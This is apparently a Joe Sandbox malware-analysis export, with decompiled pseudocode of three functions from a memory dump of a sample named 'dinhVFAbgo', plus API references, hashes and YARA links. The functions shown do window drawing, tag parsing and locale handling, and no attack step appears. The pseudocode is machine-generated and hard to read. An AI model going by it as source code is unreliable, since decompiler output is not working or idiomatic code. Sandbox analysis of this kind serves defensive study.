				 *0xe17a64(E00CC19ED() + 0x12c);
				_t200 = _t236;
				_t110 =  *_t244();
				_v24 = _t110;
				if(_t110 == 0) {
					E00CAA4E7(_t192, _t200, _t236, _t244, __eflags);
					asm("int3");
					_t267 = _t269;
					_t112 =  *0xe68dd4; // 0x8d2643c2
					_v16 = _t112 ^ _t267;
					_t193 = _t200;
					_t201 = _v4;
					_t237 = _v0;
					_v36 = _t201;
					_v40 = _t193;
					_v44 = _t237;
					 *0xe17a64(_t201, _t237, _t236, _t244, _t192, _t266);
					 *((intOrPtr*)( *((intOrPtr*)( *_t193 + 0x238))))();
					_t118 =  *((intOrPtr*)(_t237 + 0xa4)) - 0xf020;
					__eflags = _t118;
					if(_t118 == 0) {
						_push(3);
						goto L32;
					} else {
						_t130 = _t118 - 0x10;
						__eflags = _t130;
						if(_t130 == 0) {
							_push(6);
							goto L32;
						} else {
							_t131 = _t130 - 0x30;
							__eflags = _t131;
							if(_t131 == 0) {
								_push(5);
								goto L32;
							} else {
								_t128 = _t131 == 0xc0;
								__eflags = _t131 == 0xc0;
								if(_t131 == 0xc0) {
									_push(4);
									L32:
									_v44 = _v44 & 0x00000000;
									_t89 =  &_v40;
									 *_t89 = _v40 & 0x00000000;
									__eflags =  *_t89;
									_pop(_t194);
									 *0xe17a64();
									_t121 =  *((intOrPtr*)( *((intOrPtr*)( *_t237 + 0xdc))))();
									asm("movsd");
									asm("sbb eax, eax");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									_t248 = _v28;
									E00D09EB6(_t233,  *_t89, _t289, _t248, _t194,  &_v24,  ~( ~_t121),  &_v44);
									 *0xe17a64(_t248, _v36);
									_t128 =  *((intOrPtr*)( *((intOrPtr*)( *_v32 + 0x240))))();
								}
							}
						}
					}
					_pop(_t240);
					_pop(_t250);
					__eflags = _v8 ^ _t267;
					_pop(_t195);
					return E00DDCBCE(_t128, _t195, _v8 ^ _t267, _t233, _t240, _t250);
				} else {
					_v28 = E00CBA3B4(_t236, 1);
					E00CA67E1( &_v16);
					_v4 = _v4 & 0x00000000;
					E00CB2D00(_v52,  &_v16);
					asm("sbb eax, eax");
					_t252 = _a40 - _a32;
					_v20 = ( ~(_v20 & 0x00400000) & 0x00020002) + 0x8824;
					_t143 = E00CBAFB7(_t236,  &_v40,  &_v16);
					_t215 = _a32;
					_t144 =  *_t143;
					_v36 = _t144;
					if(_t144 < _t252) {
						asm("cdq");
						_t215 = _t215 + (_t252 - _t144 - _t233 >> 1);
						_t144 = _v36;
						_a32 = _t215;
					}
					_t234 = _t144 + _t215;
					_t145 = _a40;
					if(_t234 < _t145) {
						_t145 = _t234;
						_a40 = _t145;
					}
					if(_t145 > _t215) {
						if(_v32 == 0) {
							 *0xe17a64(0);
							_t154 =  *((intOrPtr*)( *((intOrPtr*)( *_t236 + 0x30))))();
							E00CC1854(_t236,  &_v16,  &_a32, _v20);
							 *0xe17a64(_t154);
							 *((intOrPtr*)( *((intOrPtr*)( *_t236 + 0x30))))();
						} else {
							_v32 =  *((intOrPtr*)( *_v56 + 0x2cc));
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t258 = _t269 - 0x10;
							_v36 = _t258;
							_t167 = E00CA68F8(_t192, _t269 - 0x10, _t258);
							_t236 = _v60;
							 *_t258 = _t167 + 0x10;
							 *0xe17a64(_t236, _v16 + 0xfffffff0, _t215, _v20, 0xa, 0xffffffff);
							 *_v32();
						}
					}
					E00CBA3B4(_t236, _v28);
					 *0xe17a64(_v24);
					return E00DDD4FA(E00CA2975( *((intOrPtr*)( *((intOrPtr*)( *_t236 + 0x28))))(), _v16 - 0x10));
				}
			}

0x00ce8940
0x00ce8940
0x00ce8940
0x00ce8940
0x00ce8940
0x00ce8947
0x00ce894c
0x00ce894f
0x00ce8952
0x00ce8955
0x00ce8962
0x00ce896d
0x00ce8972
0x00ce8975
0x00ce897a
0x00ce8981
0x00ce8984
0x00ce898a
0x00ce8992
0x00ce8997
0x00ce899c
0x00ce89ac
0x00ce89af
0x00ce89b8
0x00ce89bd
0x00ce89c8
0x00ce89da
0x00ce89dd
0x00ce89dd
0x00ce89ca
0x00ce89cc
0x00ce89d2
0x00ce89d2
0x00ce89df
0x00ce89e2
0x00ce89e4
0x00ce89ed
0x00ce89ee
0x00ce89f0
0x00ce89f2
0x00ce89f4
0x00ce89f4
0x00ce89fe
0x00ce8a03
0x00ce8a04
0x00ce8a06
0x00ce8a08
0x00ce8a0a
0x00ce8a0a
0x00ce8a0c
0x00ce8a10
0x00ce8a16
0x00ce8a12
0x00ce8a12
0x00ce8a12
0x00ce8a2d
0x00ce8a33
0x00ce8a39
0x00ce8a3b
0x00ce8a3b
0x00ce8a39
0x00ce899c
0x00ce8a40
0x00ce8a50
0x00ce8a56
0x00ce8a58
0x00ce8a5a
0x00ce8a5f
0x00ce8bac
0x00ce8bb1
0x00ce8bb3
0x00ce8bb8
0x00ce8bbf
0x00ce8bc3
0x00ce8bc5
0x00ce8bca
0x00ce8bd0
0x00ce8bdc
0x00ce8bdf
0x00ce8be2
0x00ce8bea
0x00ce8bf2
0x00ce8bf2
0x00ce8bf7
0x00ce8c16
0x00000000
0x00ce8bf9
0x00ce8bf9
0x00ce8bf9
0x00ce8bfc
0x00ce8c12
0x00000000
0x00ce8bfe
0x00ce8bfe
0x00ce8bfe
0x00ce8c01
0x00ce8c0e
0x00000000
0x00ce8c03
0x00ce8c03
0x00ce8c03
0x00ce8c08
0x00ce8c0a
0x00ce8c18
0x00ce8c1a
0x00ce8c1e
0x00ce8c1e
0x00ce8c1e
0x00ce8c22
0x00ce8c2b
0x00ce8c33
0x00ce8c3d
0x00ce8c41
0x00ce8c46
0x00ce8c4c
0x00ce8c4e
0x00ce8c4f
0x00ce8c53
0x00ce8c69
0x00ce8c71
0x00ce8c71
0x00ce8c08
0x00ce8c01
0x00ce8bfc
0x00ce8c76
0x00ce8c77
0x00ce8c78
0x00ce8c7a
0x00ce8c81
0x00ce8a65
0x00ce8a71
0x00ce8a74
0x00ce8a7f
0x00ce8a84
0x00ce8a98
0x00ce8a9a
0x00ce8aa7
0x00ce8ab2
0x00ce8ab7
0x00ce8aba
0x00ce8abc
0x00ce8ac1
0x00ce8ac7
0x00ce8acc
0x00ce8ace
0x00ce8ad1
0x00ce8ad1
0x00ce8ad4
0x00ce8ad7
0x00ce8adc
0x00ce8ade
0x00ce8ae0
0x00ce8ae0
0x00ce8ae5
0x00ce8aef
0x00ce8b4a
0x00ce8b52
0x00ce8b64
0x00ce8b71
0x00ce8b79
0x00ce8af1
0x00ce8b03
0x00ce8b10
0x00ce8b11
0x00ce8b12
0x00ce8b13
0x00ce8b14
0x00ce8b16
0x00ce8b20
0x00ce8b25
0x00ce8b2c
0x00ce8b34
0x00ce8b3d
0x00ce8b3d
0x00ce8aef
0x00ce8b80
0x00ce8b8f
0x00ce8ba9
0x00ce8ba9

APIs

__EH_prolog3.LIBCMT ref: 00CE8947
GetParent.USER32(?), ref: 00CE895B

Part of subcall function 00CB7738: GetWindowLongA.USER32 ref: 00CB7745

Part of subcall function 00D53ACD: __EH_prolog3.LIBCMT ref: 00D53AD4
Part of subcall function 00D53ACD: SendMessageA.USER32(00000000,0000007F,00000000,00000000), ref: 00D53AF7
Part of subcall function 00D53ACD: SendMessageA.USER32(00000000,0000007F,00000001,00000000), ref: 00D53B0B
Part of subcall function 00D53ACD: GetClassLongA.USER32 ref: 00D53B68
Part of subcall function 00D53ACD: GetClassLongA.USER32 ref: 00D53B79

GetSystemMetrics.USER32 ref: 00CE89A4
GetSystemMetrics.USER32 ref: 00CE89AF
GetSystemMetrics.USER32 ref: 00CE89C0
GetSystemMetrics.USER32 ref: 00CE89CC
DrawIconEx.USER32 ref: 00CE8A2D

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: MetricsSystem$Long$ClassH_prolog3MessageSend$DrawIconParentWindow
String ID:
API String ID: 1977492230-0
Opcode ID: 0d08cd713f2f357490b2f6a9d8f6d65eb7e27adfa723bc8fa114c493117a3fdd
Instruction ID: 2ae4f00a177bc016e79bf55bada74d106ce4cd1a71b122649d858b6b3a95d3ad
Opcode Fuzzy Hash: 0d08cd713f2f357490b2f6a9d8f6d65eb7e27adfa723bc8fa114c493117a3fdd
Instruction Fuzzy Hash: FFB13B72A002199FCF05DFA9C945AEEBBB6BF48310F14411AF915F7391DB74AA05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D0EB78 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 256
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00D0EB78(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t96;
				signed int _t105;
				signed int _t114;
				intOrPtr _t120;
				void* _t124;
				void* _t125;
				void* _t142;
				void* _t143;
				void* _t153;
				signed int _t155;
				intOrPtr _t156;
				intOrPtr _t168;
				intOrPtr _t175;
				intOrPtr _t181;
				intOrPtr* _t204;
				intOrPtr _t206;
				intOrPtr _t208;
				intOrPtr _t212;
				intOrPtr _t213;
				intOrPtr* _t216;
				void* _t218;
				void* _t219;
				void* _t220;

				_t220 = __eflags;
				_push(0x3c);
				E00DDD52C(0xe0c688, __ebx, __edi, __esi);
				_t204 = __ecx + 4;
				_t155 = 0;
				_push("<");
				 *(_t218 - 0x18) = 0;
				 *((intOrPtr*)(_t218 - 0x14)) = _t204;
				 *((intOrPtr*)(_t218 - 0x34)) =  *((intOrPtr*)( *_t204 - 0xc));
				E00CA2ABC(0, _t218 - 0x20, _t204, __esi, _t220);
				_t212 =  *((intOrPtr*)(_t218 + 8));
				 *((intOrPtr*)(_t218 - 4)) = 0;
				if(_t212 != 0) {
					_t96 = E00DEC1A0(_t212);
				} else {
					_t96 = 0;
				}
				_push(_t96);
				E00CA93E8(_t155, _t218 - 0x20, _t204, _t212);
				E00CA9B75(_t218 - 0x20, 0x3e);
				 *((intOrPtr*)(_t218 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t218 - 0x20)) - 0xc));
				_t168 = E00CA7BFD(_t204,  *((intOrPtr*)(_t218 - 0x20)), _t155);
				 *((intOrPtr*)(_t218 - 0x48)) = _t168;
				_t222 = _t168;
				if(_t168 < 0) {
					L25:
					E00CA2975(_t100,  *((intOrPtr*)(_t218 - 0x20)) + 0xfffffff0);
					return E00DDD4FA(_t155);
				} else {
					_t206 =  *((intOrPtr*)(_t218 - 0x24)) + _t168;
					_push("</");
					 *((intOrPtr*)(_t218 - 0x44)) = _t206;
					E00CA2ABC(_t155, _t218 - 0x1c, _t206, _t212, _t222);
					 *((char*)(_t218 - 4)) = 1;
					if(_t212 != 0) {
						_t105 = E00DEC1A0(_t212);
					} else {
						_t105 = _t155;
					}
					_push(_t105);
					E00CA93E8(_t155, _t218 - 0x1c, _t206, _t212);
					E00CA9B75(_t218 - 0x1c, 0x3e);
					_t156 = _t206;
					 *((intOrPtr*)(_t218 - 0x28)) = 1;
					 *((intOrPtr*)(_t218 - 0x2c)) = _t156;
					_t175 =  *((intOrPtr*)( *((intOrPtr*)(_t218 - 0x1c)) - 0xc));
					 *((intOrPtr*)(_t218 - 0x30)) = _t175;
					_t111 =  *((intOrPtr*)(_t218 - 0x34)) - _t175 + 1;
					 *((intOrPtr*)(_t218 - 0x40)) = _t111;
					if(_t206 >= _t111) {
						L23:
						_t155 = 0;
						goto L24;
					} else {
						_t207 =  *((intOrPtr*)(_t218 - 0x38));
						_t213 =  *((intOrPtr*)(_t218 - 0x14));
						do {
							if(E00CAAF63(_t213, _t156) != 0x3c) {
								goto L22;
							}
							if(_t156 >=  *((intOrPtr*)(_t218 - 0x34)) -  *((intOrPtr*)(_t218 - 0x24))) {
								L12:
								 *((char*)(_t218 - 0xd)) = 0;
								L13:
								_t114 =  *(_t218 - 0x18);
								if((_t114 & 0x00000001) != 0) {
									 *(_t218 - 0x18) = _t114 & 0xfffffffe;
									E00CA2975(_t114 & 0xfffffffe, _t207 - 0x10);
								}
								if( *((char*)(_t218 - 0xd)) == 0) {
									E00CA7B78( *((intOrPtr*)(_t218 - 0x14)), _t218 - 0x3c, _t156,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t218 - 0x14)))) - 0xc)) - _t156);
									 *(_t218 - 0x18) =  *(_t218 - 0x18) | 0x00000004;
									_t120 = E00DF0627( *((intOrPtr*)(_t218 - 0x3c)),  *((intOrPtr*)(_t218 - 0x1c)),  *((intOrPtr*)(_t218 - 0x30)));
									_t219 = _t219 + 0xc;
									_t111 = E00CA2975(_t120,  *((intOrPtr*)(_t218 - 0x3c)) - 0x10);
									__eflags = _t120;
									if(_t120 != 0) {
										_t156 =  *((intOrPtr*)(_t218 - 0x2c));
										L21:
										_t213 =  *((intOrPtr*)(_t218 - 0x14));
										goto L22;
									}
									_t61 = _t218 - 0x28;
									 *_t61 =  *((intOrPtr*)(_t218 - 0x28)) - 1;
									__eflags =  *_t61;
									if( *_t61 == 0) {
										_t208 =  *((intOrPtr*)(_t218 - 0x2c));
										__eflags = _t208 - 0xffffffff;
										if(_t208 == 0xffffffff) {
											goto L23;
										}
										_t181 =  *((intOrPtr*)(_t218 - 0x44));
										__eflags = _t181 - _t208;
										if(_t181 > _t208) {
											goto L23;
										}
										_t124 = E00CA7B78( *((intOrPtr*)(_t218 - 0x14)), _t218 - 0x44, _t181, _t208 - _t181);
										_t216 =  *((intOrPtr*)(_t218 + 0xc));
										 *((char*)(_t218 - 4)) = 2;
										_t125 = E00CA68A8(_t216, _t124);
										 *((char*)(_t218 - 4)) = 1;
										E00CA2975(_t125,  *((intOrPtr*)(_t218 - 0x44)) - 0x10);
										E00CA926D(_t216);
										E00CA92D4(_t216);
										_t111 = E00CA935D( *((intOrPtr*)(_t218 - 0x14)),  *((intOrPtr*)(_t218 - 0x48)), _t208 -  *((intOrPtr*)(_t218 - 0x48)) +  *((intOrPtr*)(_t218 - 0x30)));
										__eflags =  *((intOrPtr*)(_t218 + 0x10));
										if( *((intOrPtr*)(_t218 + 0x10)) != 0) {
											__eflags =  *((intOrPtr*)( *_t216 - 0xc)) - 1;
											if(__eflags > 0) {
												__eflags = E00CAAF63(_t216, 0) - 0x22;
												if(__eflags == 0) {
													__eflags =  *((intOrPtr*)( *_t216 - 0xc)) + 0xfffffffe;
													_t142 = E00CA7B78(_t216, _t218 - 0x48, 1,  *((intOrPtr*)( *_t216 - 0xc)) + 0xfffffffe);
													 *((char*)(_t218 - 4)) = 3;
													_t143 = E00CA68A8(_t216, _t142);
													 *((char*)(_t218 - 4)) = 1;
													E00CA2975(_t143,  *((intOrPtr*)(_t218 - 0x48)) - 0x10);
												}
											}
											E00CA66A0(_t216, __eflags, "\\t", "\t");
											E00CA66A0(_t216, __eflags, "\\n", "\n");
											E00CA66A0(_t216, __eflags, "\\r", "\r");
											E00CA66A0(_t216, __eflags, 0xe1f22c, 0xe1f228);
											E00CA66A0(_t216, __eflags, 0xe1f230, "<");
											E00CA66A0(_t216, __eflags, 0xe1f234, ">");
											_t111 = E00CA66A0(_t216, __eflags, "AMP", 0xe1f238);
										}
										_t155 = 1;
										L24:
										_t100 = E00CA2975(_t111,  *((intOrPtr*)(_t218 - 0x1c)) + 0xfffffff0);
										goto L25;
									}
									_t156 =  *((intOrPtr*)(_t218 - 0x2c)) - 1 +  *((intOrPtr*)(_t218 - 0x30));
									goto L21;
								} else {
									_t111 =  *((intOrPtr*)(_t218 - 0x24)) - 1;
									_t156 = _t156 +  *((intOrPtr*)(_t218 - 0x24)) - 1;
									 *((intOrPtr*)(_t218 - 0x28)) =  *((intOrPtr*)(_t218 - 0x28)) + 1;
									goto L22;
								}
							}
							E00CA7B78( *((intOrPtr*)(_t218 - 0x14)), _t218 - 0x38, _t156,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t218 - 0x14)))) - 0xc)) - _t156);
							_t207 =  *((intOrPtr*)(_t218 - 0x38));
							 *(_t218 - 0x18) =  *(_t218 - 0x18) | 0x00000003;
							_t153 = E00DF0627( *((intOrPtr*)(_t218 - 0x38)),  *((intOrPtr*)(_t218 - 0x20)),  *((intOrPtr*)(_t218 - 0x24)));
							_t213 =  *((intOrPtr*)(_t218 - 0x14));
							_t219 = _t219 + 0xc;
							 *((char*)(_t218 - 0xd)) = 1;
							if(_t153 == 0) {
								goto L13;
							}
							goto L12;
							L22:
							_t156 = _t156 + 1;
							 *((intOrPtr*)(_t218 - 0x2c)) = _t156;
						} while (_t156 <  *((intOrPtr*)(_t218 - 0x40)));
						goto L23;
					}
				}
			}

0x00d0eb78
0x00d0eb78
0x00d0eb7f
0x00d0eb84
0x00d0eb87
0x00d0eb8e
0x00d0eb93
0x00d0eb96
0x00d0eb9c
0x00d0eb9f
0x00d0eba4
0x00d0eba7
0x00d0ebac
0x00d0ebb3
0x00d0ebae
0x00d0ebae
0x00d0ebae
0x00d0ebb9
0x00d0ebbe
0x00d0ebc8
0x00d0ebd5
0x00d0ebdf
0x00d0ebe1
0x00d0ebe4
0x00d0ebe6
0x00d0ed38
0x00d0ed3e
0x00d0ed4a
0x00d0ebec
0x00d0ebef
0x00d0ebf4
0x00d0ebf9
0x00d0ebfc
0x00d0ec01
0x00d0ec07
0x00d0ec0e
0x00d0ec09
0x00d0ec09
0x00d0ec09
0x00d0ec14
0x00d0ec19
0x00d0ec23
0x00d0ec2b
0x00d0ec2d
0x00d0ec34
0x00d0ec37
0x00d0ec3f
0x00d0ec42
0x00d0ec43
0x00d0ec48
0x00d0ed2b
0x00d0ed2b
0x00000000
0x00d0ec4e
0x00d0ec4e
0x00d0ec51
0x00d0ec54
0x00d0ec5e
0x00000000
0x00000000
0x00d0ec6c
0x00d0eca5
0x00d0eca5
0x00d0eca9
0x00d0eca9
0x00d0ecae
0x00d0ecb6
0x00d0ecb9
0x00d0ecb9
0x00d0ecc2
0x00d0ece2
0x00d0ecea
0x00d0ecf3
0x00d0ecf8
0x00d0ed00
0x00d0ed05
0x00d0ed07
0x00d0ed18
0x00d0ed1b
0x00d0ed1b
0x00000000
0x00d0ed1b
0x00d0ed09
0x00d0ed09
0x00d0ed09
0x00d0ed0d
0x00d0ed4d
0x00d0ed50
0x00d0ed53
0x00000000
0x00000000
0x00d0ed55
0x00d0ed58
0x00d0ed5a
0x00000000
0x00000000
0x00d0ed69
0x00d0ed6e
0x00d0ed74
0x00d0ed78
0x00d0ed80
0x00d0ed87
0x00d0ed8e
0x00d0ed95
0x00d0eda7
0x00d0edac
0x00d0edb0
0x00d0edb8
0x00d0edbc
0x00d0edc7
0x00d0edc9
0x00d0edd2
0x00d0eddc
0x00d0ede4
0x00d0ede8
0x00d0edf0
0x00d0edf7
0x00d0edf7
0x00d0edc9
0x00d0ee08
0x00d0ee19
0x00d0ee2a
0x00d0ee3b
0x00d0ee4c
0x00d0ee5d
0x00d0ee6e
0x00d0ee6e
0x00d0ee75
0x00d0ed2d
0x00d0ed33
0x00000000
0x00d0ed33
0x00d0ed13
0x00000000
0x00d0ecc4
0x00d0ecc7
0x00d0ecc8
0x00d0ecca
0x00000000
0x00d0ecca
0x00d0ecc2
0x00d0ec81
0x00d0ec89
0x00d0ec8c
0x00d0ec92
0x00d0ec97
0x00d0ec9a
0x00d0ec9d
0x00d0eca3
0x00000000
0x00000000
0x00000000
0x00d0ed1e
0x00d0ed1e
0x00d0ed1f
0x00d0ed22
0x00000000
0x00d0ec54
0x00d0ec48

APIs

__EH_prolog3.LIBCMT ref: 00D0EB7F

Part of subcall function 00CA2ABC: __EH_prolog3.LIBCMT ref: 00CA2AC3

_strlen.LIBCMT ref: 00D0EBB3
_strlen.LIBCMT ref: 00D0EC0E
__fassign.LIBCMT ref: 00D0EC92
__fassign.LIBCMT ref: 00D0ECF3

Strings

AMP, xrefs: 00D0EE67

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: H_prolog3__fassign_strlen
String ID: AMP
API String ID: 699354456-2695192153
Opcode ID: d6629807ec5cec29b14edef383e4aff651305547d677d799ce98a1386076494e
Instruction ID: f50754cdd05a131b4b98ce76b5e81c16c7693a9729f6b91d6c2dea6ea23cae45
Opcode Fuzzy Hash: d6629807ec5cec29b14edef383e4aff651305547d677d799ce98a1386076494e
Instruction Fuzzy Hash: AA917871A40219AFDF04EBA8D896AEDB7B5EF5A308F180118F415B72D1CB746E41CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00DF333E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 255
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E00DF333E(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				short _v706;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				intOrPtr _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int* _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				intOrPtr _v772;
				signed int _v784;
				void* __ebp;
				signed int _t156;
				void* _t163;
				signed int _t164;
				signed int _t166;
				signed int _t167;
				intOrPtr _t168;
				signed int _t171;
				signed int _t173;
				signed int _t174;
				signed int _t177;
				signed int _t179;
				signed int _t182;
				signed int _t183;
				signed int _t185;
				signed int _t186;
				signed int _t202;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t212;
				void* _t213;
				signed int _t220;
				intOrPtr* _t221;
				char* _t228;
				intOrPtr _t232;
				intOrPtr* _t233;
				signed int _t235;
				signed int _t240;
				signed int _t241;
				intOrPtr _t246;
				void* _t247;
				void* _t250;
				signed int _t252;
				signed int _t254;
				signed int _t257;
				signed int* _t258;
				short _t259;
				signed int _t260;
				void* _t262;
				void* _t263;
				void* _t264;

				_t244 = __edx;
				_t156 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t156 ^ _t260;
				_push(__ebx);
				_t212 = _a8;
				_push(__esi);
				_push(__edi);
				_t246 = _a4;
				_v736 = _t212;
				_v732 = E00DF4B3D(__ecx, __edx) + 0x278;
				_t163 = E00DF2A29(_t212, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v716);
				_t263 = _t262 + 0x18;
				if(_t163 == 0) {
					L39:
					_t164 = 0;
					__eflags = 0;
					goto L40;
				} else {
					_t10 = _t212 + 2; // 0x6
					_t252 = _t10 << 4;
					_t166 =  &_v272;
					_v712 = _t252;
					_t244 =  *(_t252 + _t246);
					_t220 = _t244;
					while(1) {
						_v704 = _v704 & 0x00000000;
						_t254 = _v712;
						if( *_t166 !=  *_t220) {
							break;
						}
						if( *_t166 == 0) {
							L6:
							_t167 = _v704;
						} else {
							_t259 =  *((intOrPtr*)(_t166 + 2));
							_v706 = _t259;
							_t254 = _v712;
							if(_t259 !=  *((intOrPtr*)(_t220 + 2))) {
								break;
							} else {
								_t166 = _t166 + 4;
								_t220 = _t220 + 4;
								if(_v706 != 0) {
									continue;
								} else {
									goto L6;
								}
							}
						}
						L8:
						if(_t167 != 0) {
							_t221 =  &_v272;
							_t244 = _t221 + 2;
							do {
								_t168 =  *_t221;
								_t221 = _t221 + 2;
								__eflags = _t168 - _v704;
							} while (_t168 != _v704);
							_v708 = (_t221 - _t244 >> 1) + 1;
							_t171 = E00DF598E(4 + ((_t221 - _t244 >> 1) + 1) * 2);
							_v724 = _t171;
							__eflags = _t171;
							if(_t171 == 0) {
								goto L39;
							} else {
								_v720 =  *((intOrPtr*)(_t254 + _t246));
								_v740 =  *(_t246 + 0xa0 + _t212 * 4);
								_v744 =  *(_t246 + 8);
								_t228 =  &_v272;
								_v728 = _t171 + 4;
								_t173 = E00DEC133(_t171 + 4, _v708, _t228);
								_t264 = _t263 + 0xc;
								__eflags = _t173;
								if(_t173 != 0) {
									_t174 = _v704;
									_push(_t174);
									_push(_t174);
									_push(_t174);
									_push(_t174);
									_push(_t174);
									E00DE2347();
									asm("int3");
									_push(_t260);
									_push(_t228);
									_v784 = _v784 & 0x00000000;
									_t177 = E00DF52FE(_v772, 0x20001004,  &_v784, 2);
									__eflags = _t177;
									if(_t177 == 0) {
										L49:
										return 0xfde9;
									}
									_t179 = _v12;
									__eflags = _t179;
									if(_t179 == 0) {
										goto L49;
									}
									return _t179;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t254 + _t246)) = _v728;
									if(_v272 != 0x43) {
										L17:
										_t182 = E00DF2746(_t212, _t246,  &_v700);
										_t244 = _v704;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L17;
										} else {
											_t244 = _v704;
											_t182 = _t244;
										}
									}
									 *(_t246 + 0xa0 + _t212 * 4) = _t182;
									__eflags = _t212 - 2;
									if(_t212 != 2) {
										__eflags = _t212 - 1;
										if(_t212 != 1) {
											__eflags = _t212 - 5;
											if(_t212 == 5) {
												 *((intOrPtr*)(_t246 + 0x14)) = _v716;
											}
										} else {
											 *((intOrPtr*)(_t246 + 0x10)) = _v716;
										}
									} else {
										_t258 = _v732;
										 *(_t246 + 8) = _v716;
										_v708 = _t258[8];
										_t240 = _t258[9];
										_v716 = _t240;
										while(1) {
											__eflags =  *(_t246 + 8) -  *(_t258 + _t244 * 8);
											if( *(_t246 + 8) ==  *(_t258 + _t244 * 8)) {
												break;
											}
											_t210 =  *(_t258 + _t244 * 8);
											_t240 =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v708;
											 *(_t258 + 4 + _t244 * 8) = _v716;
											_t244 = _t244 + 1;
											_t212 = _v736;
											_v708 = _t210;
											_v716 = _t240;
											__eflags = _t244 - 5;
											if(_t244 < 5) {
												continue;
											} else {
											}
											L25:
											__eflags = _t244 - 5;
											if(__eflags == 0) {
												_t202 = E00DF9C62(_t244, __eflags, _v704, 1, 0xe421a0, 0x7f,  &_v528,  *(_t246 + 8), 1);
												_t264 = _t264 + 0x1c;
												__eflags = _t202;
												if(_t202 == 0) {
													_t241 = _v704;
												} else {
													_t204 = _v704;
													do {
														 *(_t260 + _t204 * 2 - 0x20c) =  *(_t260 + _t204 * 2 - 0x20c) & 0x000001ff;
														_t204 = _t204 + 1;
														__eflags = _t204 - 0x7f;
													} while (_t204 < 0x7f);
													_t206 = E00DDFDA6( &_v528,  *0xe68ee0, 0xfe);
													_t264 = _t264 + 0xc;
													__eflags = _t206;
													_t241 = 0 | _t206 == 0x00000000;
												}
												_t258[1] = _t241;
												 *_t258 =  *(_t246 + 8);
											}
											 *(_t246 + 0x18) = _t258[1];
											goto L37;
										}
										__eflags = _t244;
										if(_t244 != 0) {
											 *_t258 =  *(_t258 + _t244 * 8);
											_t258[1] =  *(_t258 + 4 + _t244 * 8);
											 *(_t258 + _t244 * 8) = _v708;
											 *(_t258 + 4 + _t244 * 8) = _t240;
										}
										goto L25;
									}
									L37:
									_t183 = _t212 * 0xc;
									_t111 = _t183 + 0xe42228; // 0xca3f1c
									 *0xe17a64(_t246);
									_t185 =  *((intOrPtr*)( *_t111))();
									_t232 = _v720;
									__eflags = _t185;
									if(_t185 == 0) {
										__eflags = _t232 - 0xe69050;
										if(_t232 == 0xe69050) {
											L44:
											_t186 = _v712;
										} else {
											_t257 = _t212 + _t212;
											__eflags = _t257;
											asm("lock xadd [eax], ecx");
											if(_t257 != 0) {
												goto L44;
											} else {
												E00DF47C5( *((intOrPtr*)(_t246 + 0x28 + _t257 * 8)));
												E00DF47C5( *((intOrPtr*)(_t246 + 0x24 + _t257 * 8)));
												E00DF47C5( *(_t246 + 0xa0 + _t212 * 4));
												_t186 = _v712;
												_t235 = _v704;
												 *(_t186 + _t246) = _t235;
												 *(_t246 + 0xa0 + _t212 * 4) = _t235;
											}
										}
										_t233 = _v724;
										 *_t233 = 1;
										_t164 =  *(_t186 + _t246);
										 *((intOrPtr*)(_t246 + 0x28 + (_t212 + _t212) * 8)) = _t233;
									} else {
										 *((intOrPtr*)(_v712 + _t246)) = _t232;
										E00DF47C5( *(_t246 + 0xa0 + _t212 * 4));
										 *(_t246 + 0xa0 + _t212 * 4) = _v740;
